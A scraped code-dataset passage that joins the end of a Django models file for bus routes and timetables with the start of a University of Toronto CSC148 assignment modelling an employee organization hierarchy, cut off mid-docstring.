self.stop_list[bound][dayperiod]:\n stop_list[stop] = Stop.objects.get(atco_code=stop)\n return stop_list\n\n def get_all_vehicle_journeys(self):\n return VehicleJourney.objects.filter(journey_pattern__route__line=self).order_by('departure_time')\n\n def generate_stop_list(self):\n stop_list = {\n 'inbound': {\n 'MondayToFriday': [],\n 'Saturday': [],\n 'Sunday': [],\n 'HolidaysOnly': []\n },\n 'outbound': {\n 'MondayToFriday': [],\n 'Saturday': [],\n 'Sunday': [],\n 'HolidaysOnly': []\n }\n }\n\n for bound in ['inbound', 'outbound']:\n for dayperiod in ['MondayToFriday', 'Saturday', 'Sunday', 'HolidaysOnly']:\n stop_list[bound][dayperiod] = list(Stop.objects.filter(\n departure_journeys__journey_pattern_section__journey_patterns__route__in=\n Route.objects.filter(line=self, journey_patterns__direction=bound,\n journey_patterns__journeys__days_of_week=dayperiod)).distinct()\\\n .order_by('departure_journeys__stop_from_sequence_number').values_list('atco_code', flat=True))\n last_stop = Stop.objects.filter(\n arrival_journeys__journey_pattern_section__journey_patterns__route__in=\n Route.objects.filter(line=self, journey_patterns__direction=bound,\n journey_patterns__journeys__days_of_week=dayperiod))\\\n .order_by('departure_journeys__stop_to_sequence_number').last()\n if last_stop:\n stop_list[bound][dayperiod].append(last_stop.atco_code)\n self.stop_list = stop_list\n self.save()\n\n def generate_timetable(self):\n # Create list of stops per line number\n self.generate_stop_list()\n\n line_timetable = {\n 'inbound': {\n 'MondayToFriday': {},\n 'Saturday': {},\n 'Sunday': {},\n 'HolidaysOnly': {}\n },\n 'outbound': {\n 'MondayToFriday': {},\n 'Saturday': {},\n 'Sunday': {},\n 'HolidaysOnly': {}\n }\n }\n\n for bound in ['inbound', 'outbound']:\n for dayperiod in ['MondayToFriday', 'Saturday', 'Sunday', 'HolidaysOnly']:\n journeys = VehicleJourney.objects.filter(journey_pattern__route__line=self,\n journey_pattern__direction=bound,\n days_of_week=dayperiod).distinct().order_by('departure_time')\n timetable = line_timetable[bound][dayperiod]\n for stop in self.stop_list[bound][dayperiod]:\n timetable[stop] = []\n i = 0\n for journey in journeys:\n journey.generate_timetable()\n for stop in self.stop_list[bound][dayperiod]:\n timetable[stop].append(None)\n for journey_timetable_entry in journey.timetable:\n try:\n timetable[journey_timetable_entry['stop_id']][i] = journey_timetable_entry['time']\n except:\n print(bound, dayperiod, journey.id, journey.journey_pattern.id, journey.journey_pattern.route.id, journey_timetable_entry)\n i += 1\n\n self.timetable = line_timetable\n self.save()\n\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s (%s)\" % (self.line_name, self.description)\n\n\nclass Route(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n description = models.TextField()\n line = models.ForeignKey(Line, related_name='routes', on_delete=models.CASCADE)\n stops_list = models.TextField()\n last_modified = models.DateTimeField(auto_now=True)\n\n def get_all_vehicle_journeys(self):\n return VehicleJourney.objects.filter(journey_pattern__route=self).order_by('departure_time')\n\n def get_stops_list(self):\n bus_stops = []\n for stop in self.stops_list.split(','):\n bus_stops.append(Stop.objects.get(atco_code=stop))\n return bus_stops\n\n def get_route_coordinates(self):\n bus_stops = []\n for stop in self.stops_list.split(','):\n bus_stops.append(Stop.objects.get(atco_code=stop).get_coordinates())\n return bus_stops\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s - %s\" % (self.line, self.description)\n\n\nclass JourneyPatternSection(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s\" % (self.id)\n\n\nclass JourneyPatternTimingLink(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n stop_from = models.ForeignKey(Stop, related_name='departure_journeys', on_delete=models.CASCADE)\n stop_from_timing_status = models.CharField(max_length=3)\n stop_from_sequence_number = models.IntegerField()\n stop_to = models.ForeignKey(Stop, related_name='arrival_journeys', on_delete=models.CASCADE)\n stop_to_timing_status = models.CharField(max_length=3)\n stop_to_sequence_number = models.IntegerField()\n run_time = models.DurationField()\n wait_time = models.DurationField(null=True, blank=True)\n journey_pattern_section = models.ForeignKey(JourneyPatternSection, related_name='timing_links',\n on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return \"%s - %s (%s)\" % (self.stop_from, self.stop_to, self.run_time)\n\n\nclass JourneyPattern(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n route = models.ForeignKey(Route, related_name='journey_patterns', on_delete=models.CASCADE)\n direction = models.CharField(max_length=100)\n section = models.ForeignKey(JourneyPatternSection, related_name='journey_patterns', on_delete=models.CASCADE)\n last_modified = models.DateTimeField(auto_now=True)\n\n @python_2_unicode_compatible\n def __str__(self):\n return self.id\n\n\n################################################################################################\n# VehicleJourney\n# Directly from TNDS file\n# Deprecated journey_pattern (timinglinks are now TimetableStops)\n################################################################################################\nclass VehicleJourney(models.Model):\n id = models.CharField(max_length=255, primary_key=True, db_index=True)\n journey_pattern_ref = models.CharField(max_length=100, null=True, blank=True) # E.g. \"JP2\"\n line = models.ForeignKey(Line, related_name='journeys', null=True, blank=True, on_delete=models.CASCADE)\n departure_time = models.TimeField()\n days_of_week = models.CharField(max_length=100, null=True, blank=True)\n nonoperation_bank_holidays = models.CharField(max_length=200, null=True, blank=True)\n operation_bank_holidays = models.CharField(max_length=200, null=True, blank=True)\n direction = models.CharField(max_length=100, null=True, blank=True) # E.g. \"outbound\"|\"inbound\"|blank\n tnds_zone = models.CharField(max_length=20, null=True, blank=True) # E.g. \"EA\"\n order = models.IntegerField()\n last_modified = models.DateTimeField(auto_now=True)\n\n def get_timetable(self):\n return TimetableStop.objects.filter(vehicle_journey=self).order_by('order')\n\n @property\n def timetable(self):\n timetable = []\n for time in TimetableStop.objects.filter(vehicle_journey=self).order_by('order'):\n timetable.append({'stop': time.stop.atco_code, 'time': time.time, 'order': time.order})\n return timetable\n\n def get_timetable_prefetch(self):\n return self.get_timetable().select_related('stop')\n\n def get_stops_list(self):\n return TimetableStop.objects.filter(vehicle_journey=self).order_by('order').values('stop')\n\n @python_2_unicode_compatible\n def __str__(self):\n return self.id\n\nclass SpecialDaysOperation(models.Model):\n vehicle_journey = models.ForeignKey(VehicleJourney, related_name='special_days_operation', on_delete=models.CASCADE)\n days = DateRangeField()\n operates = models.BooleanField()\n\n class Meta:\n indexes = [\n models.Index(fields=['vehicle_journey', 'days', 'operates']),\n ]\n\nclass Timetable(models.Model):\n vehicle_journey = models.ForeignKey(VehicleJourney, related_name='journey_times', on_delete=models.CASCADE)\n stop = models.ForeignKey(Stop, related_name='journey_times', on_delete=models.CASCADE)\n time = models.TimeField()\n order = models.IntegerField() # Order of the stop in the vehicle journey (first stop, order = 1)\n last_stop = models.BooleanField(default=False) # Last stop of a vehicle journey\n\n class Meta:\n indexes = [\n models.Index(fields=['vehicle_journey', 'stop', 'time', 'order', 'last_stop']),\n ]\n\n################################################################################################\n# TimetableStop replaces Timetable, contains stop-time pairs for each VehicleJourney\n# ALL timetable info stored in TimetableStops and VehicleJourney\n# i.e. we collect data from JourneyPattern, JourneyPatternSections, JourneyPatternTimingLinks\n################################################################################################\nclass TimetableStop(models.Model):\n vehicle_journey = models.ForeignKey(VehicleJourney, related_name='timetable_stops', on_delete=models.CASCADE)\n stop = models.ForeignKey(Stop, related_name='timetable_stops', on_delete=models.CASCADE)\n time = models.TimeField()\n direction = models.CharField(max_length=100,null=True,blank=True)\n run_time = models.DurationField()\n wait_time = models.DurationField(null=True, blank=True)\n order = models.IntegerField() # Order of the stop in the vehicle journey (first stop, order = 1)\n last_stop = models.BooleanField(default=False) # Last stop of a vehicle journey\n\n class Meta:\n indexes = [\n models.Index(fields=['vehicle_journey', 'stop', 'time', 'order', 'last_stop']),\n ]\n","sub_path":"tfc_web/transport/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"553480370","text":"\"\"\"Assignment 2: Organization Hierarchy\nYou must NOT use list.sort() or sorted() in your code.\n\n=== CSC148 Fall 2019 ===\nDepartment of Computer Science,\nUniversity of Toronto\n\n=== Module description ===\nThis module contains all of the classes necessary to model the entities\nin an organization's hierarchy.\n\nThis code is provided solely for the personal and private use of\nstudents taking the CSC148 course at the University of Toronto.\nCopying for purposes other than this use is expressly prohibited.\nAll forms of distribution of this code, whether as given or with\nany changes, are expressly prohibited.\n\nAuthor: Sophia Huynh\n\nAll of the files in this directory and all subdirectories are:\nCopyright (c) 2019 Sophia Huynh\n\"\"\"\nfrom __future__ import annotations\nfrom typing import List, Optional, Union, TextIO, Set\n\n\ndef merge(lst1: list, lst2: list) -> list:\n \"\"\"Return a sorted list with the elements in and .\n\n Pre-condition: and are both sorted.\n\n >>> merge([1, 2, 5], [3, 4, 6])\n [1, 2, 3, 4, 5, 6]\n \"\"\"\n result = []\n i, j = 0, 0\n while i < len(lst1) and j < len(lst2):\n if lst1[i] < lst2[j]:\n result.append(lst1[i])\n i += 1\n else:\n result.append(lst2[j])\n j += 1\n return result + lst1[i:] + lst2[j:]\n\n\nclass Employee:\n \"\"\"An Employee: an employee in an organization.\n\n === Public Attributes ===\n eid:\n The ID number of the employee. Within an organization, each employee ID\n number is unique.\n name:\n The name of the Employee.\n position:\n The name of the Employee's position within the organization.\n salary:\n The salary of the Employee.\n rating:\n The rating of the Employee.\n\n === Private Attributes ===\n _superior:\n The superior of the Employee in the organization.\n _subordinates:\n A list of the Employee's direct subordinates (Employees that work under\n this Employee).\n\n === Representation Invariants ===\n - eid > 0\n - Within an organization, each eid only appears once. Two Employees cannot\n share the same eid.\n - salary > 0\n - 0 <= rating <= 100\n - Subordinates in _subordinates are in increasing order of eid.\n \"\"\"\n eid: int\n name: str\n position: str\n salary: float\n rating: int\n _superior: Optional[Employee]\n _subordinates: List[Employee]\n\n def __init__(self, eid: int, name: str, position: str,\n salary: float, rating: int) -> None:\n \"\"\"Initialize this Employee with the ID , name ,\n position , salary and rating .\n\n >>> e = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e.eid\n 1\n >>> e.rating\n 50\n \"\"\"\n self.eid = eid\n self.name = name\n self.position = position\n self.salary = salary\n self.rating = rating\n self._superior = None\n self._subordinates = []\n\n def __lt__(self, other: Employee) -> bool:\n \"\"\"Return True iff is an Employee and this Employee's eid is\n less than 's eid.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1 < e2\n True\n \"\"\"\n return self.eid < other.eid\n\n def get_direct_subordinates(self) -> List[Employee]:\n \"\"\"Return a list of the direct subordinates of this Employee in order of\n ascending IDs.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e2.get_direct_subordinates()[0].name\n 'Emma Ployee'\n \"\"\"\n return self._subordinates\n\n def get_all_subordinates(self) -> List[Employee]:\n \"\"\"Return a list of all of the subordinates of this Employee in order of\n ascending IDs.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.get_all_subordinates()[0].name\n 'Emma Ployee'\n >>> e3.get_all_subordinates()[1].name\n 'Sue Perior'\n \"\"\"\n result = self.get_direct_subordinates()\n for s in self.get_direct_subordinates():\n result = merge(result, s.get_all_subordinates())\n return result\n\n def get_organization_head(self) -> Employee:\n \"\"\"Return the head of the organization.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1.get_organization_head().name\n 'Bigg Boss'\n \"\"\"\n if self.get_superior() is None:\n return self\n return self.get_superior().get_organization_head()\n\n def get_superior(self) -> Optional[Employee]:\n \"\"\"Returns the superior of this Employee or None if no superior exists.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_superior() is None\n True\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e1.get_superior().name\n 'Sue Perior'\n \"\"\"\n return self._superior\n\n def become_subordinate(self, superior: Union[Employee, None]) -> None:\n \"\"\"Set this Employee's superior to and becomes a direct\n subordinate of .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e1.get_superior().eid\n 2\n >>> e2.get_direct_subordinates()[0].eid\n 1\n >>> e1.become_subordinate(None)\n >>> e1.get_superior() is None\n True\n >>> e2.get_direct_subordinates()\n []\n \"\"\"\n if superior is not None:\n superior.add_subordinate(self)\n else:\n if self.get_superior() is not None:\n self.get_superior().remove_subordinate_id(self.eid)\n self._superior = superior\n\n def remove_subordinate_id(self, eid: int) -> None:\n \"\"\"Remove the subordinate with the eid from this Employee's list\n of direct subordinates.\n\n Does NOT change the employee with eid 's superior.\n\n Pre-condition: This Employee has a subordinate with eid .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e1.become_subordinate(e2)\n >>> e2.get_direct_subordinates()[0].eid\n 1\n >>> e2.remove_subordinate_id(1)\n >>> e2.get_direct_subordinates()\n []\n >>> e1.get_superior() is e2\n True\n \"\"\"\n self._subordinates = [s for s in self._subordinates if s.eid != eid]\n # for i in range(len(self._subordinates)):\n # if self._subordinates[i].eid == eid:\n # self._subordinates.pop(i)\n # break\n\n def add_subordinate(self, subordinate: Employee) -> None:\n \"\"\"Add to this Employee's list of direct subordinates.\n\n Does NOT change subordinate's superior.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e2.add_subordinate(e1)\n >>> e2.get_direct_subordinates()[0].eid\n 1\n >>> e1.get_superior() is None\n True\n \"\"\"\n if subordinate not in self.get_direct_subordinates():\n self._subordinates = \\\n merge(self.get_direct_subordinates(), [subordinate])\n\n def get_employee(self, eid: int) -> Optional[Employee]:\n \"\"\"Returns the employee with ID or None if no such employee exists\n as a subordinate of this employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.get_employee(1) is e1\n True\n >>> e1.get_employee(1) is e1\n True\n >>> e2.get_employee(3) is None\n True\n \"\"\"\n if self.eid == eid:\n return self\n for s in self.get_all_subordinates():\n if s.eid == eid:\n return s\n return None\n\n def get_employees_paid_more_than(self, amount: float) -> List[Employee]:\n \"\"\"Get all subordinates of this employee that have a salary higher than\n (including this employee, if this employee's salary is higher\n than ).\n\n Employees must be returned in increasing order of eid.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> more_than_10000 = e3.get_employees_paid_more_than(10000)\n >>> len(more_than_10000) == 2\n True\n >>> more_than_10000[0].name\n 'Sue Perior'\n >>> more_than_10000[1].name\n 'Bigg Boss'\n \"\"\"\n result = [s for s in self.get_all_subordinates() if s.salary > amount]\n if self.salary > amount:\n result = merge([self], result)\n return result\n\n def get_higher_paid_employees(self) -> List[Employee]:\n \"\"\"Return a list of all employees in the organization (the organization\n head and their subordinates) that are paid more than this employee\n\n Employees must be returned with IDs in increasing order.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> e3 = Employee(3, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> [e.name for e in e1.get_higher_paid_employees()]\n ['Sue Perior', 'Bigg Boss']\n >>> [e.name for e in e2.get_higher_paid_employees()]\n ['Bigg Boss']\n >>> e3.get_higher_paid_employees()\n []\n \"\"\"\n return self.get_organization_head().get_employees_paid_more_than(\n self.salary)\n\n def get_closest_common_superior(self, eid: int) -> Employee:\n \"\"\"Return the closest common superior in the organization (the\n organization head and their subordinates) between the employee and the\n employee with ID .\n\n Precondition: exists in the organization.\n\n >>> e1 = Employee(1, \"Bigg Boss\", \"CEO\", 50000, 60)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 50)\n >>> e3 = Employee(3, \"John Doe\", \"Worker\", 10000, 30)\n >>> e4 = Employee(4, \"Mane Gerr\", \"Manager\", 20000, 50)\n >>> e5 = Employee(5, \"Jane Doe\", \"Worker\", 10000, 30)\n >>> e2.become_subordinate(e1)\n >>> e3.become_subordinate(e2)\n >>> e4.become_subordinate(e1)\n >>> e5.become_subordinate(e2)\n >>> e3.get_closest_common_superior(5).name\n 'Sue Perior'\n >>> e3.get_closest_common_superior(4).name\n 'Bigg Boss'\n >>> e3.get_closest_common_superior(2).name\n 'Sue Perior'\n \"\"\"\n if self.get_employee(eid) is None:\n return self.get_superior().get_closest_common_superior(eid)\n return self\n\n def get_department_name(self) -> str:\n \"\"\"Returns the name of the department this Employee is in. If the\n Employee is not part of a department, return an empty string.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_department_name()\n ''\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1.become_subordinate(e2)\n >>> e1.get_department_name()\n 'Department'\n \"\"\"\n if isinstance(self, Leader):\n return self.get_department_name()\n if self.get_superior() is None:\n return \"\"\n return self.get_superior().get_department_name()\n\n def get_position_in_hierarchy(self) -> str:\n \"\"\"Return the full position of the Employee.\n The full position takes the form:\n \n\n Followed by a comma separating any departments they're a part of (from\n their immediate department, to the department that one belongs to, and\n so on.)\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_position_in_hierarchy()\n 'Worker'\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1.get_position_in_hierarchy()\n 'Worker, Department, Company'\n >>> e2.get_position_in_hierarchy()\n 'Manager, Department, Company'\n >>> e3.get_position_in_hierarchy()\n 'CEO, Company'\n \"\"\"\n return ', '.join([self.position] + self._get_all_department_names([]))\n\n def get_department_name2(self) -> Optional[str]:\n \"\"\"Returns the name of the department this Employee is in. If the\n Employee is not part of a department, return None.\n\n Note: This method is almost the same as get_department_name, except it\n returns None instead of a blank string if the Employee is not in a\n department.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_department_name2() is None\n True\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1.become_subordinate(e2)\n >>> e1.get_department_name2()\n 'Department'\n \"\"\"\n if isinstance(self, Leader):\n return self.get_department_name() # Leader.get_department_name\n if self.get_superior() is None:\n return None\n return self.get_superior().get_department_name2()\n\n def _get_all_department_names(self, curr: List[str]) -> List[str]:\n \"\"\"Helper method that creates a list of all the departments an\n Employee is in.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1._get_all_department_names([])\n ['Department', 'Company']\n \"\"\"\n if self.get_department_name2() is not None and \\\n self.get_department_name2() not in curr:\n curr.append(self.get_department_name2())\n if self.get_superior() is not None:\n return self.get_superior()._get_all_department_names(curr)\n return curr\n\n def get_department_leader(self) -> Optional[Employee]:\n \"\"\"Return the leader of this Employee's department. If this Employee is\n not in a department, return None.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_department_leader() is None\n True\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e1.get_department_leader().name\n 'Sue Perior'\n >>> e2.get_department_leader().name\n 'Sue Perior'\n \"\"\"\n if self.get_superior() is None:\n if self.get_department_name2() is None:\n return None\n return self\n if self.get_department_name2() != \\\n self.get_superior().get_department_name2():\n return self\n return self.get_superior().get_department_leader()\n\n def create_leader(self, department_name: str) -> Leader:\n \"\"\"Create and return a Leader of with the same\n attributes as Employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> l1 = e1.create_leader(\"Company\")\n >>> isinstance(l1, Leader)\n True\n >>> l1.name\n 'Emma Ployee'\n >>> l1.get_department_name()\n 'Company'\n \"\"\"\n return Leader(self.eid, self.name, self.position, self.salary,\n self.rating, department_name)\n\n def _remove_subordinate_deep(self, employee: Employee) -> None:\n \"\"\"Remove from the list of subordinates of this Employee, or\n remove from the list of subordinates of all the subordinates\n of this Employee.\n\n Precondition: in self.get_all_subordinates()\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3._remove_subordinate_deep(e1)\n >>> [e.name for e in e3.get_all_subordinates()]\n ['Sue Perior']\n \"\"\"\n if employee in self.get_direct_subordinates():\n self.remove_subordinate_id(employee.eid)\n else:\n for s in self.get_direct_subordinates():\n s._remove_subordinate_deep(employee)\n\n def change_department_leader(self) -> Employee:\n \"\"\"Makes this Employee the leader of their current department,\n becoming the superior of the current department leader.\n The Employee keeps all of their subordinates, in addition\n to gaining the leader as a subordinate. Return this new leader.\n\n If this Employee is already a leader or does not belong to a\n department, do nothing and return this Employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> l2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> l3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(l2)\n >>> l2.become_subordinate(l3)\n >>> l1 = e1.change_department_leader()\n >>> len(l3.get_direct_subordinates())\n 1\n >>> l3.get_direct_subordinates()[0].name\n 'Emma Ployee'\n >>> len(l1.get_direct_subordinates())\n 1\n >>> l1.get_direct_subordinates()[0].name\n 'Sue Perior'\n >>> l1.get_direct_subordinates()[0].get_department_leader().name\n 'Emma Ployee'\n >>> l1.get_superior().name\n 'Bigg Boss'\n \"\"\"\n if isinstance(self, Leader) or self.get_department_name2() is None:\n return self\n old_leader = self.get_department_leader()\n old_employee = self\n new_leader = \\\n old_employee.create_leader(old_employee.get_department_name2())\n new_employee = old_leader.create_employee()\n new_employee.become_subordinate(new_leader)\n old_leader._remove_subordinate_deep(old_employee)\n for s in old_employee.get_direct_subordinates():\n s.become_subordinate(new_leader)\n for s in old_leader.get_direct_subordinates():\n s.become_subordinate(new_employee)\n if old_leader.get_superior() is not None:\n old_leader.get_superior().remove_subordinate_id(old_leader.eid)\n new_leader.become_subordinate(old_leader.get_superior())\n return new_leader\n\n def become_leader(self, department_name: str) -> Leader:\n \"\"\"Make this Employee the leader of a new department with the\n name .\n\n If this employee is already a leader, change the name of their\n department to .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> l3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(l3)\n >>> l2 = e2.become_leader(\"Department\")\n >>> l2.get_department_name()\n 'Department'\n >>> l3.get_direct_subordinates()[0].name\n 'Sue Perior'\n >>> e1.get_department_leader().name\n 'Sue Perior'\n >>> l2 = l2.become_leader(\"New Department\")\n >>> l2.get_department_name()\n 'New Department'\n \"\"\"\n new_leader = self.create_leader(department_name)\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_leader)\n if self.get_superior() is not None:\n self.get_superior().remove_subordinate_id(self.eid)\n new_leader.become_subordinate(self.get_superior())\n return new_leader\n\n def get_highest_rated_subordinate(self) -> Employee:\n \"\"\"Return the subordinate of this employee with the highest rating.\n\n Pre-condition: This Employee has at least one subordinate.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_position_in_hierarchy()\n 'Worker'\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.get_highest_rated_subordinate().name\n 'Sue Perior'\n >>> e1.become_subordinate(e3)\n >>> e3.get_highest_rated_subordinate().name\n 'Emma Ployee'\n \"\"\"\n max_rating = -1\n max_employee = None\n for s in self.get_direct_subordinates():\n if s.rating > max_rating: # id order is accounted for with >\n max_rating = s.rating\n max_employee = s\n return max_employee\n\n def swap_up(self) -> Employee:\n \"\"\"Swap this Employee with their superior. Return the version of this\n Employee that is contained in the Organization (i.e. if this Employee\n becomes a Leader, the new Leader version is returned).\n\n Pre-condition: self is not the head of the Organization.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> new_e1 = e1.swap_up()\n >>> isinstance(new_e1, Leader)\n True\n >>> new_e2 = new_e1.get_direct_subordinates()[0]\n >>> isinstance(new_e2, Employee)\n True\n >>> new_e1.position\n 'Manager'\n >>> new_e1.eid\n 1\n >>> e3.get_direct_subordinates()[0] is new_e1\n True\n \"\"\"\n if isinstance(self, Leader):\n new_subordinate = Leader(self.get_superior().eid,\n self.get_superior().name,\n self.position, self.salary,\n self.get_superior().rating,\n self.get_department_name())\n else:\n new_subordinate = Employee(self.get_superior().eid,\n self.get_superior().name,\n self.position, self.salary,\n self.get_superior().rating)\n if isinstance(self.get_superior(), Leader):\n new_superior = Leader(self.eid, self.name,\n self.get_superior().position,\n self.get_superior().salary, self.rating,\n self.get_superior().get_department_name())\n else:\n new_superior = Employee(self.eid, self.name,\n self.get_superior().position,\n self.get_superior().salary, self.rating)\n new_subordinate.become_subordinate(new_superior)\n self.get_superior().remove_subordinate_id(self.eid)\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_subordinate)\n for s in self.get_superior().get_direct_subordinates():\n s.become_subordinate(new_superior)\n if self.get_superior().get_superior() is not None:\n self.get_superior().get_superior().remove_subordinate_id(\n self._superior.eid)\n new_superior.become_subordinate(\n self.get_superior().get_superior())\n return new_superior\n\n def fire_subordinate(self, eid: int) -> None:\n \"\"\"Fire the subordinate of this Employee with ID .\n\n Pre-condition: there is a subordinate of this Employee with ID .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.fire_subordinate(2)\n >>> [e.name for e in e3.get_all_subordinates()]\n ['Emma Ployee']\n >>> e1.get_superior().name\n 'Bigg Boss'\n \"\"\"\n for s in self.get_direct_subordinates():\n if s.eid == eid:\n self.remove_subordinate_id(eid)\n for sub in s.get_direct_subordinates():\n sub.become_subordinate(self)\n return\n for s in self.get_direct_subordinates(): # not in direct\n s.fire_subordinate(eid)\n\n def remove_head(self) -> Employee:\n \"\"\"Remove this Employee and replace their position with their highest\n rated direct subordinate. The removed Employee loses all their\n subordinates.\n\n Returns the new head of the organization.\n\n Pre-condition: this Employee is the head of the organization.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e4 = Employee(4, \"Mane Gerr\", \"Manager\", 